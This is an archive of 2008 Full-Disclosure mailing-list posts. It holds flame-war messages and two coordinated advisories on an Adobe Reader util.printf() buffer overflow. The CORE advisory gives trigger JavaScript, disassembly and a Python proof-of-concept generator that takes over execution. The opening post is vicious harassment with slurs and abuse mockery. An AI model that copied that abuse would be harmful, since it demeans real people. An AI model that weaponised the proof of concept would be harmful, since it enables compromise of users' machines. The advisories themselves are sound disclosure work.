all and you are wasting your time? I guess somewhere in your medicated head
this incessant ranting is your BEST attempt at bettering the world and, to be
honest, you really fucking suck at it.

The rest of us are laughing at you. Laughing at you like the scared pussy
that you are. Scared of the real man.

Look at the 7 days without you - no one was asking "where's n3td3v" were they?
No, everyone was enjoying the fact that you were in hospital having the guards
do reruns of your drunk uncles night time visits your bedroom. That shit
fucked you up for life didn't it, faggot?

From fergdawgster at gmail.com Tue Nov 4 06:37:27 2008
From: fergdawgster at gmail.com (Paul Ferguson)
Date: Mon, 3 Nov 2008 22:37:27 -0800
Subject: [Full-disclosure] Securing our computers?
In-Reply-To:
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
Message-ID: <6cd462c00811032237y3f6420b5r5d41ea70bfb89019@mail.gmail.com>

What's a n3td3v?

- ferg

On Mon, Nov 3, 2008 at 10:26 PM, Biz Marqee wrote:
> "so i suggest you don't fuck with n3td3v"
> --SNIP--

--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/

From akl at experian.dk Tue Nov 4 09:12:34 2008
From: akl at experian.dk (Anders Klixbull)
Date: Tue, 4 Nov 2008 10:12:34 +0100
Subject: [Full-disclosure] Odays offers
In-Reply-To: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>
References: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>

Fuck the vendors put them on FD

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Ureleet
Sent: 3. november 2008 20:24
To: anti security
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Odays offers

i haz an idea. report them to the fucking vendors, like you are supposed
to you shitass. or to uscert. or, here's an idea, fucking post them on
FD. Isn't that what FD is for?

On Mon, Nov 3, 2008 at 6:36 AM, anti security wrote:
> Dear people,
>
> I'm proposing some really interesting 0days for Windows && Linux.
> Please answer only by private email.
>
> See you soon

From akl at experian.dk Tue Nov 4 09:14:18 2008
From: akl at experian.dk (Anders Klixbull)
Date: Tue, 4 Nov 2008 10:14:18 +0100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <48989dd70811032117wbbd7c40l5066c1559412a202@mail.gmail.com>
References: <20081104013841.3CEA52003F@smtp.hushmail.com> <48989dd70811032117wbbd7c40l5066c1559412a202@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32494@PRO-EXCHANGESRV.experian.dk>

???? ????????!

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Michael Boman
Sent: 4. november 2008 06:17
To: Elazar Broad
Cc: full-disclosure at lists.grok.org.uk; vulcanius at gmail.com
Subject: Re: [Full-disclosure] Securing our computers?

Beer and Whiskey, unless you have a good Russian vodka - the Swedish
ones ain't that good compared to the Russians.

Best regards
Michael Boman

On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad wrote:
> What's your poison of choice?
>
> On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman wrote:
>>I already have a drinking game going, awarding myself a drink for
>>every time n3td3v says something stupid, and every time I play it I
>>run out of booze or blacks out... Dangerous stuff... If you are in my
>>area we can play it together sometime...
>>
>>Best regards
>>Michael Boman
>>
>>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius wrote:
>>> Actually I think a new game should be created that revolves around stalking
>>> n3td3v. Points would be awarded for the quickest response to each of his
>>> worthless posts. At the end of the month a Stalker of the Month could be
>>> selected and given a prize. Bonus points could be given out for the most
>>> degrading responses. I think it could be a lot of fun.
>>>
>>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp wrote:
>>>>
>>>> Jesus ... you guys need to get back on your lithium...
>>
>>--
>>http://michaelboman.org - Security Blog & Wiki

--
http://michaelboman.org - Security Blog & Wiki

From akl at experian.dk Tue Nov 4 09:11:20 2008
From: akl at experian.dk (Anders Klixbull)
Date: Tue, 4 Nov 2008 10:11:20 +0100
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <20081103184957.GB5218@mail.msys.ch>
References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com><4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com> <20081103184957.GB5218@mail.msys.ch>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32492@PRO-EXCHANGESRV.experian.dk>

Free 0day for all!!

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Marc Balmer
Sent: 3. november 2008 19:50
To: n3td3v
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?

* n3td3v wrote:
> ---------- Forwarded message ----------
> From: n3td3v
> Date: Mon, Nov 3, 2008 at 1:15 PM
> Subject: 0day auctions, should they be outlawed?
> To: n3td3v
>
>
> i'll be lobbying soon to outlaw 0day auctions, this means the banning
> of 0day sales on the internet. i've noticed an increased level in 0day
> sales lately on mailing lists, and web sites... i think this should be
> against the law. let me know what your opinions are on this, so i can
> form what i'm going to say when i lobby people about it. cheers.

wrong approach. there should be a law that the state has to buy all 0days
and publish them here on undisclosure. that would be good use of tax
money... ;)

From akl at experian.dk Tue Nov 4 09:09:54 2008
From: akl at experian.dk (Anders Klixbull)
Date: Tue, 4 Nov 2008 10:09:54 +0100
Subject: [Full-disclosure] Universal Website Hijacking by Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day
In-Reply-To:
References: <5ae653bf0810310131s3cc5d21cm2aacdd2c60f8dc73@mail.gmail.com> <5ae653bf0810311518u14272c60o19b133c3e288a529@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32491@PRO-EXCHANGESRV.experian.dk>

Shut up

-----Original Message-----
From: Adrian P [mailto:unknown.pentester at gmail.com]
Sent: 1. november 2008 04:05
To: Fionnbharr
Cc: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Universal Website Hijacking by Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day

Hi Fionnbharr,

Well, that's fair enough. tbh, I couldn't find older examples, but this is
one of the points of sending a post to the lists: other people can review
it and give feedback. I just sometimes wished people were more
constructive on FD.

Regarding the paper, well, it can be useful for people who want to find a
similar issue in their firewall/proxy appliances. Don't you think?

No need to call anyone names IMO. And please, why do people keep attacking
Kaminsky? He has greatly contributed to the infosec community so please
give him some credit!

Thanks for your email anyway. Perhaps, you could have expressed yourself
in a less aggressive/more constructive manner?

Regards,
ap.

On Fri, Oct 31, 2008 at 10:18 PM, Fionnbharr wrote:
> Sure, this attack vector has been 'discovered' by lots of people in
> the past, or even concurrently, that's my point. It doesn't merit a
> whole paper on it. Not to mention you're getting on the FUD/Kaminsky
> bandwagon when GNUtards release a statement like 'New technique to
> universally hijack websites', trying to get some media attention for
> something everyone else already knew.
>
> re: the bluecoat vuln, if you read my post I just said it was a recent
> (or as you might put it, *recent*) example of this type of
> vulnerability. I've this sort of vuln myself with client software and
> so has a number of other people I know. Glad to see the majority of
> your email is completely irrelevant.
>
>
> 2008/11/1 Adrian P :
>> Hello Fionnbharr,
>>
>> Please see my response to your comments in-line.
>>
>> On Fri, Oct 31, 2008 at 8:31 AM, Fionnbharr wrote:
>>> This isn't new. It isn't even a technique.
>>>
>>> http://www.bluecoat.com/support/securityadvisories/icap_patience
>>>
>>> A very recent example of this kind of vulnerability. My god you
>>> gnucitizen people are retarded. At least you didn't give it a
>>> ridiculous name like 'clickjacking'. Can you GNUtards please keep
>>> your 'research' into subjects people already know to yourself or at
>>> least not post it the lists, then at least I won't have to see it.
>>
>> That Bluecoat advisory was released on 29 September 2008. What makes
>> you think that I did not discover the SonicWALL vulnerability/vector
>> and reported it to ZDI *way before* that date? Well, FYI I reported
>> it to ZDI in June 2008 and discovered it even before.
>>
>> At least, you should consider the possibility of the attack vector
>> being discovered by two researchers concurrently. It can take quite a
>> few months before the vendor provides a patch, not to mention that
>> SonicWALL was VERY slow to confirm the vulnerability.
>>
>> Don't you know that responsible disclosure means that the details of
>> a vulnerability can be held for quite a while before being released
>> to the public? Since when the publishing date of an advisory is equal
>> to discovery date?
>>
>> Furthermore, it appears that Bluecoat only released their advisory
>> *after* the researcher jplopezy made his advisory public, which could
>> suggest that he did NOT inform the vendor before releasing the
>> details:
>>
>> http://www.securityfocus.com/archive/1/496940/30/0/threaded
>>
>> It's also interesting that the researcher released the advisory
>> (bugtraq post) one day *after* I published the general description of
>> the attack:
>>
>> June 25th, 2008.
>> ZDI forwards my findings to SonicWALL (see "Disclosure Timeline"):
>> http://www.zerodayinitiative.com/advisories/ZDI-08-070/
>>
>> September 20th, 2008.
>> I publish the general description of the attack:
>> http://www.gnucitizen.org/blog/new-technique-to-perform-universal-website-hijacking/
>>
>> September 21th, 2008.
>> Researcher jplopezy finds the same attack vector on BlueCoat's web filter:
>> http://www.securityfocus.com/archive/1/496577/30/0/threaded
>>
>> Notice jplopezy published the bugtraq post *one day after* I
>> published the general attack description on GNUCITIZEN. Interesting?
>>
>> Please do your homework before making any accusations.
>>
>>>
>>> Also "Malaysia: Cracking into Embedded Devices and Beyond!", who the
>>> fuck uses the word 'cracking' instead of 'hacking' in 2008? Sure for
>>> cracking passwords, but wow.
>>
>> Can't you accept the idea some of us still consider hacking and
>> breaking into a system not necessarily the same thing?
>>
>> Regards,
>> ap.
>>
>>>
>>> 2008/10/31 Adrian P :
>>>> Hello folks,
>>>>
>>>> Yesterday, I presented for the first time [1] a new method to
>>>> perform universal website hijacking by exploiting content filtering
>>>> features commonly supported by corporate firewalls. I briefly
>>>> discussed [2] the finding on GNUCITIZEN in the past without giving
>>>> away the details, but rather mentioning what the attacker can do
>>>> and some characteristics of the attack.
>>>>
>>>> Anyway, I'm now releasing full details on how the technique works,
>>>> and a real 0day example against SonicWALL firewalls.
>>>>
>>>> The paper can be found on the GNUCITIZEN labs site. Please let me
>>>> know if you can successfully use the same technique against
>>>> firewalls by other vendors:
>>>>
>>>> http://sites.google.com/a/gnucitizen.org/lab/research-papers
>>>>
>>>> Finally, I'd like to thank Zero Day Initiative [3] for their great
>>>> work and the Hack in the Box crew for organizing such a fine event!
>>>>
>>>> Regards,
>>>> ap.
>>>>
>>>> REFERENCES
>>>>
>>>> [1] "HITBSecConf2008 - Malaysia: Cracking into Embedded Devices and Beyond!"
>>>> http://conference.hackinthebox.org/hitbsecconf2008kl/?page_id=186
>>>>
>>>> [2] "New technique to perform universal website hijacking"
>>>> http://www.gnucitizen.org/blog/new-technique-to-perform-universal-website-hijacking/
>>>>
>>>> [3] "SonicWALL Content-Filtering Universal Script Injection Vulnerability"
>>>> http://www.zerodayinitiative.com/advisories/ZDI-08-070/
>>>>
>>>> --
>>>> Adrian "pagvac" Pastor | GNUCITIZEN gnucitizen.org

From badzmanaois at gmail.com Tue Nov 4 09:48:55 2008
From: badzmanaois at gmail.com (Salvador III Manaois)
Date: Tue, 4 Nov 2008 17:48:55 +0800
Subject: [Full-disclosure] Odays offers
In-Reply-To: <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
References: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
Message-ID:

sell 'em at wabisabilabi.

ops, too late:

http://www.techworld.com/security/news/index.cfm?newsID=106294

...badz...
Bytes & Badz: http://badzmanaois.blogspot.com

From xploitable at gmail.com Tue Nov 4 10:16:04 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 4 Nov 2008 10:16:04 +0000
Subject: [Full-disclosure] Odays offers
In-Reply-To: <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
References: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
Message-ID: <4b6ee9310811040216t78919e8au45c5b3fee8b6e8a9@mail.gmail.com>

On Tue, Nov 4, 2008 at 9:12 AM, Anders Klixbull wrote:
> Fuck the vendors put them on FD
>

What do you mean 'fuck the vendors put them on fd'? what kind of
practice are you running?
Are you trying to say everyone who posts vulnerabilities on fd has your
mind set of 'fuck the vendors'? Are you trying to say this is a 'fuck the
vendors' mailing list? If so this isn't a very polite mailing list is it?
Please refrain from future language of this nature, as not everyone who
posts to fd has a 'fuck the vendors' mind set. You are a very rude person
not the kind of person everyone on fd agrees with your language of 'fuck
the vendors', you could put it in a more carefully constructed manner as
not to be so rude. You are the worst kind of individual to be posting to
fd with your mind set of 'fuck the vendors'. Trust me not everyone who
posts to fd has your mentality of 'fuck the vendors'. Does this mean you
are wanting the vendors to be fucked? You are running borderline on
unethical, and this list is full of whitehats like me who get angry when
blackhats come on the list and think they can behave in a nature that's
unethical. You should learn some manners and go wash your mouth out with
soap and water.

From akl at experian.dk Tue Nov 4 11:18:54 2008
From: akl at experian.dk (Anders Klixbull)
Date: Tue, 4 Nov 2008 12:18:54 +0100
Subject: [Full-disclosure] Odays offers
In-Reply-To: <4b6ee9310811040216t78919e8au45c5b3fee8b6e8a9@mail.gmail.com>
References: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com><282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk> <4b6ee9310811040216t78919e8au45c5b3fee8b6e8a9@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32495@PRO-EXCHANGESRV.experian.dk>

Go suck a lemon bitch

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v
Sent: 4. november 2008 11:16
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Odays offers

On Tue, Nov 4, 2008 at 9:12 AM, Anders Klixbull wrote:
> Fuck the vendors put them on FD
>

What do you mean 'fuck the vendors put them on fd'?
what kind of practice are you running? Are you trying to say everyone who
posts vulnerabilities on fd has your mind set of 'fuck the vendors'? Are
you trying to say this is a 'fuck the vendors' mailing list? If so this
isn't a very polite mailing list is it? Please refrain from future
language of this nature, as not everyone who posts to fd has a 'fuck the
vendors' mind set. You are a very rude person not the kind of person
everyone on fd agrees with your language of 'fuck the vendors', you could
put it in a more carefully constructed manner as not to be so rude. You
are the worst kind of individual to be posting to fd with your mind set of
'fuck the vendors'. Trust me not everyone who posts to fd has your
mentality of 'fuck the vendors'. Does this mean you are wanting the
vendors to be fucked? You are running borderline on unethical, and this
list is full of whitehats like me who get angry when blackhats come on the
list and think they can behave in a nature that's unethical. You should
learn some manners and go wash your mouth out with soap and water.

From randallm at fidmail.com Tue Nov 4 13:50:56 2008
From: randallm at fidmail.com (Big R)
Date: Tue, 4 Nov 2008 07:50:56 -0600
Subject: [Full-disclosure] apology-www.dia.mil
Message-ID:

Last week a post was given concerning www.dia.mil. I quickly brushed it off
as just someone not or thinking they were seeing something. Guess so much
dumb junk on the list lately contributed to that conclusion. Well, I am
sorry. Nice catch:

http://www.informationweek.com/news/security/government/showArticle.jhtml?articleID=211800622

--
been great, thanks
Big R

From xploitable at gmail.com Tue Nov 4 13:57:56 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 4 Nov 2008 13:57:56 +0000
Subject: [Full-disclosure] Odays offers
In-Reply-To:
References: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
Message-ID: <4b6ee9310811040557q161e3321lc4c429275c483702@mail.gmail.com>

now maybe he should shut down his zone-h site as well and keep whitehats happy :)

On Tue, Nov 4, 2008 at 9:48 AM, Salvador III Manaois wrote:
> sell 'em at wabisabilabi.
>
> ops, too late:
>
> http://www.techworld.com/security/news/index.cfm?newsID=106294
>

From fd.leach at googlemail.com Mon Nov 3 21:51:57 2008
From: fd.leach at googlemail.com (Some Guy Posting To Full Disclosure)
Date: Mon, 3 Nov 2008 13:51:57 -0800
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
Message-ID: <197321660811031351pdfa5371y121bebb8b8c7396e@mail.gmail.com>

It's futile trying to use the law to change things. It will simply
force people into the shadows. Which today involves using tor and some
Russian web money account.

I read a slogan from before my time, in a book: "If source is outlawed
outlaws will have source" - same applies to zero days.

Anyway I don't think it should be Illegal. I own a set of lock picks -
I don't intend to break into someone's house. And if I did I'd go to
jail (for the burglary and being equipped with picks), until then I'm
innocent. The UK's law has an attitude like that - I like it!

Resources should go into actually preventing crimes taking place. Not
stumbling around hoping that making it awkward for criminals to get
the tools they need will make a difference.

Simon.

From remove-vuln at secunia.com Tue Nov 4 14:01:52 2008
From: remove-vuln at secunia.com (Secunia Research)
Date: Tue, 4 Nov 2008 15:01:52 +0100
Subject: [Full-disclosure] Secunia Research: Adobe Acrobat/Reader "util.printf()" Buffer Overflow
Message-ID: <200811041401.mA4E1qP2024703@ca.secunia.com>

======================================================================

Secunia Research 04/11/2008

- Adobe Acrobat/Reader "util.printf()" Buffer Overflow -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Adobe Acrobat / Reader version 8.1.2

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where: Remote

======================================================================
3) Vendor's Description of Software

"Adobe Acrobat 8 Professional software enabled business professionals to reliably create, combine, and control Adobe PDF documents for easy, more secure distribution, collaboration, and data collection."

Product Link:
http://www.adobe.com/products/acrobat/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Adobe Acrobat/Reader, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error when parsing format strings containing a floating point specifier in the "util.printf()" Javascript function and can be exploited to cause a stack-based buffer overflow via a specially crafted PDF.

Successful exploitation may allow execution of arbitrary code when viewing a malicious PDF file.

======================================================================
5) Solution

The vendor will be releasing fixes later today.

NOTE: This was supposed to be a coordinated disclosure with Adobe, but a third party has leaked the information.

======================================================================
6) Time Table

16/04/2008 - Vendor notified.
17/04/2008 - Vendor response.
09/05/2008 - Vendor informed that similar vulnerability will be fixed in Foxit Reader this month.
10/05/2008 - Vendor response thanking for the heads-up.
20/05/2008 - Similar vulnerability published for Foxit Reader.
22/10/2008 - Vendor provides status update.
31/10/2008 - Vendor provides another status update along with a draft of the upcoming security bulletin.
04/11/2008 - Public disclosure.

======================================================================
7) Credits

Discovered by Dyon Balding, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2008-2992 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-14/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

From advisories at coresecurity.com Tue Nov 4 16:09:17 2008
From: advisories at coresecurity.com (CORE Security Technologies Advisories)
Date: Tue, 04 Nov 2008 14:09:17 -0200
Subject: [Full-disclosure] CORE-2008-0526: Adobe Reader Javascript Printf Buffer Overflow
Message-ID: <491073AD.1080801@coresecurity.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

Adobe Reader Javascript Printf Buffer Overflow

1. *Advisory Information*

Title: Adobe Reader Javascript Printf Buffer Overflow
Advisory ID: CORE-2008-0526
Advisory URL: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
Date published: 2008-11-04
Date of last update: 2008-11-04
Vendors contacted: Adobe
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: Yes (client-side)
Locally Exploitable: Yes
Bugtraq ID: 30035
CVE Name: CVE-2008-2992

3. *Vulnerability Description*

Adobe Reader is arguably the world's most ubiquitous electronic document sharing application. The software can be used to view, search, digitally sign, verify, print, and collaborate on Adobe PDF files, and includes scripting functionality to allow for extended customization and extensibility.

Adobe Reader suffers from a stack buffer overflow when parsing specially crafted (invalid) PDF files. The vulnerability is caused due to a boundary error when parsing format strings containing a floating point specifier in the "util.printf()" JavaScript function. Successful exploitation of the vulnerability requires that users open a maliciously crafted PDF file thereby allowing attackers to gain access to vulnerable systems and assume the privileges of a user running Acrobat Reader.

Adobe Reader version 9, which was released in June 2008, is not vulnerable to the reported problem.

4. *Vulnerable packages*

. Adobe Reader 8.1.2
. Acrobat 8.1.2

5. *Non-vulnerable packages*

. Adobe Reader 9
. Acrobat 9
. Adobe Reader 8.1.3
. Acrobat 8.1.3

6. *Vendor Information, Solutions and Workarounds*

Adobe will issue a security update that addresses the vulnerable version 8.1.2 of Reader.

Alternatively, a possible workaround for this vulnerability is to disable JavaScript in Adobe Reader and Acrobat (in the software's Edit/Preferences menu). Disabling JavaScript will prevent the issue, although it will also prevent many basic Acrobat and Reader workflows from properly functioning.

7. *Credits*

The CVE-2008-2992 vulnerability was discovered by Damian Frizza from the CORE IMPACT Exploit Writers Team at Core Security Technologies while investigating the feasibility of exploiting a bug in Foxit Reader that had been disclosed in May 2008. The CVE-2008-1104 vulnerability was discovered in Foxit Reader by Dyon Balding from Secunia Research.

8. *Technical Description / Proof of Concept Code*

While investigating the feasibility of exploiting the vulnerability previously disclosed in Foxit Reader (CVE-2008-1104) [1] we found that Adobe Reader was affected by the same bug.

After an initial examination of the involved implementation bug, it was believed that although present, the problem was apparently not exploitable in Adobe Reader due to the use of two structured exception handlers in the program.

The primary difference between the Adobe and Foxit applications is the manner in which they perform security checks, and at first glance, it seemed as if the bug was not exploitable in Reader, since there was no way to control the program's first exception handler.

However, upon further examination of the code, we found that another overflow occurs before the call to the involved code is made in relation to the previously known vulnerability. This new problem was identified in the way vulnerable versions of Adobe Reader implement the JavaScript util.printf() function. The function first converts the argument it receives to a String, using only the first 16 digits of the argument and padding the rest with a fixed value of "0" (0x30). By passing an overly long and properly formatted command to the function it is possible to overwrite the program's memory and control its execution flow. A specifically crafted PDF file that embeds JavaScript code to manipulate the program's memory allocation pattern and trigger the vulnerability can allow an attacker to execute arbitrary code with the privileges of a user running the Adobe Reader application.

We now present the details of the vulnerability. The original Secunia advisory concerning Foxit Reader stated: "the vulnerability is caused due to a boundary error when parsing format strings containing a floating point specifier in the 'util.printf()' JavaScript function." While researching this bug we found that the following Javascript code triggers the bug:

/-----------

var num = 1.2
util.printf("%5000f",num)

- -----------/

These two simple Javascript lines cause the byte 0x20 to be copied 5000 times on the stack. This allows to take control of the exception handler, and also to trigger an exception when trying to write in the section that comes after the stack. By filling somehow the heap until the address 0x20202020, for example by doing a heap spray from the Javascript, an exploit can be made for Foxit Reader.

After a Proof of Concept PDF file was crafted, we tried to open it with Adobe Reader 8.1.2. The application closed without warning, without crash, simply closed. By disassembling the DLL library Escript.api, we reached this code:

/-----------

238AF9C5    PUSH EDI
238AF9C6    PUSH 20
238AF9C8    PUSH ESI
238AF9C9    CALL MSVCR80.memset

- -----------/

This is exactly the same bug, where EDI is the size to be copied, controlled by the attacker, and ESI is the destination, pointing to a buffer in the stack. The program generates an exception here:

/-----------

78144AFF    REP STOS DWORD PTR ES:[EDI]

- -----------/

inside the code of the memset function, when trying to write in the section that comes after the stack. We examined the active SEH (Structured Exception Handlers), and found that in this case (unlike the Foxit case), we have two SEH:

/-----------

Address     SE handler
0012EE70    EScript.238F6F95
0012F140    20202020

- -----------/

One has been completely overwritten by us, and the other not.
The code of the first handler is:

/-----------

238F6F95    MOV EDX,DWORD PTR SS:[ESP+8]
238F6F99    LEA EAX,DWORD PTR DS:[EDX+C]
238F6F9C    MOV ECX,DWORD PTR DS:[EDX-58]
238F6F9F    XOR ECX,EAX
238F6FA1    CALL EScript.23806D28           Security Cookie Check 1
238F6FA6    MOV ECX,DWORD PTR DS:[EDX+22C]
238F6FAC    XOR ECX,EAX
238F6FAE    CALL EScript.23806D28           Security Cookie Check 2
238F6FB3    MOV EAX,EScript.2391B54C
238F6FB8    JMP MSVCR80.__CxxFrameHandler3

- -----------/

When the exception is generated, this handler takes the control and is charged of checking two security cookies. One of them has been overwritten, so the execution jumps directly to ExitProcess. Until now, the difference between the two bugs is only the cookies check. In Foxit we have the following structure on the stack:

/-----------

Memset Buffer
RET
...
...
SEH
...
...

- -----------/

Whereas in Adobe Reader we basically have:

/-----------

SEH1 --> Security Cookie Check
...
Memset Buffer
SecurityCookie
RET
...
SEH2 --> Overwritten with 0x20202020

- -----------/

At first sight, it seems that this bug is not exploitable, since there is no way to control the first handler. But... looking at the code, we found that before the vulnerable call to memset, another overflow occurs. As a first step, the program transforms the argument received by the function util.printf() to a String here:

/-----------

238AF8D1    FSTP QWORD PTR SS:[ESP]
238AF8D4    CALL DWORD PTR DS:[MSVCR80._fcvt]

- -----------/

The function returns only the first 16 digits, and the rest is padded with "0" (0x30). This is copied to the stack here:

/-----------

238AF946    MOV EAX,DWORD PTR SS:[EBP-28]
238AF949    MOV AL,BYTE PTR DS:[EAX+EDX]
238AF94C    MOV BYTE PTR DS:[ESI+EDI],AL    # copy to the stack
238AF94F    INC EDI
238AF950    INC EDX
238AF951    CMP EDX,ECX

- -----------/

After this copy is completed, the stack has the following disposition:

/-----------

Float To String Buffer
...
...
SEH1 --> Overwritten with 0x30303030
...
...
Memset Buffer
...
...
SEH2 --> Overwritten with 0x20202020
...
...

- -----------/

If we call the vulnerable function with a long enough number, we can avoid the cookies check and jump to the address 0x30303030. By allocating memory somehow and copying our shellcode there, we can execute arbitrary code in the context of the application. The following Python code generates a PoC Javascript code:

/-----------

fill = 276 * '8'
script="""
var num = 12999999999999999999_FILL_
util.printf("%45000f",num)
"""
script = script.replace('_FILL_', fill)
print script

- -----------/

By embedding the generated script in a PDF file, we got an 'Access violation when executing [30303030]'.

9. *Report Timeline*

. 2008-05-27: Core Security Technologies notifies the vendor of the vulnerability, similar to the CVE-2008-1104 vulnerability affecting Foxit Reader.
. 2008-05-27: Vendor acknowledges notification.
. 2008-05-28: Core sends technical details of the vulnerability, and a Javascript PoC that triggers the bug.
. 2008-05-28: Vendor confirms that they were aware of this vulnerability. Vendor states that it will be fixed in an update, and that the schedule for this update is still to be determined.
. 2008-05-29: Core sends some corrections to the info provided, and asks to be updated about the progress for releasing a fixed version.
. 2008-05-30: Vendor agrees to keep Core updated on their progress.
. 2008-06-09: Core sends the advisory draft, and states that it plans to publish the advisory on June 23rd. Core also offers the vendor to include a vendor statement in the advisory.
. 2008-06-09: Vendor states that the issue will be solved in an update for Adobe Reader 8.1.2, and in the next major release of Adobe Acrobat and Reader.
. 2008-06-13: Core requests an estimated date for the release of the next major Adobe Reader version, and expresses its concerns respect to delaying the publication of the advisory, since it is straightforward for a potential attacker to rediscover the vulnerability and exploit it "in the wild", given its relation to the Foxit reader CVE-2008-1104 bug.
. 2008-06-16: Vendor responds that it expects the Adobe Reader 8.1.2 update to occur in the July timeframe.
. 2008-06-27: Core requests updated information concerning the release dates of Adobe Reader 9 and the 8.1.2 update.
. 2008-06-28: Vendor responds that Adobe Reader 9 is scheduled for July 1st.
. 2008-07-01: Vendor states that the 8.1.2 update is tentatively scheduled for an early fall release, and not in July as previously informed.
. 2008-07-01: Adobe Reader 9 is publicly released.
. 2008-07-01: Core communicates its intention to publish its security advisory on July 2nd, given that there is a fixed Adobe Reader version available, and that the vulnerability is closely related to a vulnerability already publicly known and exploited (the Foxit reader CVE-2008-1104 bug).
. 2008-07-01: Vendor requests Core to hold off the publication of the advisory, because there is still no solution for Adobe Acrobat 8 customers besides paying for an upgrade to Acrobat 9.
. 2008-07-01: Core requests additional information before revising the publication date: a list of vulnerable products and versions, a concrete date for the release of the Acrobat and Reader 8.1.2 update, and possible workarounds for this vulnerability.
. 2008-07-02: Vendor confirms that the vulnerable products and versions are: Adobe Reader 8.1.2 and Acrobat 8.1.2.
. 2008-07-02: Vendor confirms that disabling JavaScript will prevent the issue, although it will also prevent many basic Acrobat and Reader workflows from properly functioning. Vendor commits to providing an estimated release date for the Acrobat 8.1.2 update as soon as possible.
. 2008-07-02: Core communicates that it will reschedule the publication of the advisory.
. 2008-07-02: Vendor states that it is working with the team to get a more specific schedule.
. 2008-07-08: Vendor states that it is still working on expediting the fix.
. 2008-07-08: Core appreciates the updates, and asks for the CVE number assigned to this issue.
. 2008-07-09: Vendor communicates the estimated release date of October 15th.
. 2008-07-09: Vendor states that the release of an updated Acrobat version is still estimated for October 15th.
. 2008-09-03: Core requests updated information.
. 2008-09-03: Vendor responds that the release date is still estimated for October 15th.
